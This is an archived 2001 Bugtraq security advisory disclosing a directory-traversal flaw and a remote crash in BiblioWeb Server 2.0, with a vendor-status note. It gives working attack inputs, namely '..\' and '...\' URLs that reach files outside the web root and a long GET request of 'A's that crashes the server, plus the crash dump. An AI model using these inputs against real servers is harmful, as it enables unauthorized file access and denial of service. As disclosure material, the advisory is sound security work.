[19006] in bugtraq
Vulnerabilities in BiblioWeb Server
daemon@ATHENA.MIT.EDU (joetesta@HUSHMAIL.COM)
Mon Feb 5 14:02:20 2001
Content-Type: multipart/mixed;
boundary="Hushpart_boundary_suRNMGRRalllozOWDVsFcuqpfMbfQhCX"
Mime-Version: 1.0
Message-Id: <200102051740.JAA16326@user7.hushmail.com>
Date: Mon, 5 Feb 2001 12:40:22 -0800
Reply-To: joetesta@HUSHMAIL.COM
From: joetesta@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
--Hushpart_boundary_suRNMGRRalllozOWDVsFcuqpfMbfQhCX
Content-type: text/plain
To Ben Greenbaum:
Please post this advisory instead of the last. I needed to
make a minor change to the 'Vendor Status' section. Thanks.
----------
Vulnerabilities in BiblioWeb Server
Overview
BiblioWeb Server 2.0 is a web server available from
http://www.biblioscape.com. A vulnerability exists which allows a remote
user to break out of the web root using relative paths (ie: '..', '...').
A second vulnerability allows a remote attacker to crash the server.
Details
To break out of the web root, use the following URLs:
http://localhost/..\[file outside web root]
http://localhost/...\[file outside web root]
To crash the server, telnet to port 80, and send:
GET /[a lot of 'A's]
The server crashes with the following dump:
BIBLIOWEB caused an invalid page fault in
module BIBLIOWEB.EXE at 017f:004069fd.
Registers:
EAX=00408b70 CS=017f EIP=004069fd EFLGS=00010283
EBX=00408b70 SS=0187 ESP=0415fe88 EBP=04160418
ECX=00000001 DS=0187 ESI=04160414 FS=58df
EDX=04160414 ES=0187 EDI=04160518 GS=0000
Bytes at CS:EIP:
68 00 04 00 00 8d 44 24 04 50 8b 43 04 50 8b 03
Stack dump:
Solution
No quick fix is possible.
Vendor Status
CG Information was contacted via <support@biblioscape.com> on Monday,
January 29, 2001. No reply was received.
- Joe Testa ( e-mail: joetesta@hushmail.com / AIM: LordSpankatron
)
--Hushpart_boundary_suRNMGRRalllozOWDVsFcuqpfMbfQhCX--
IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.
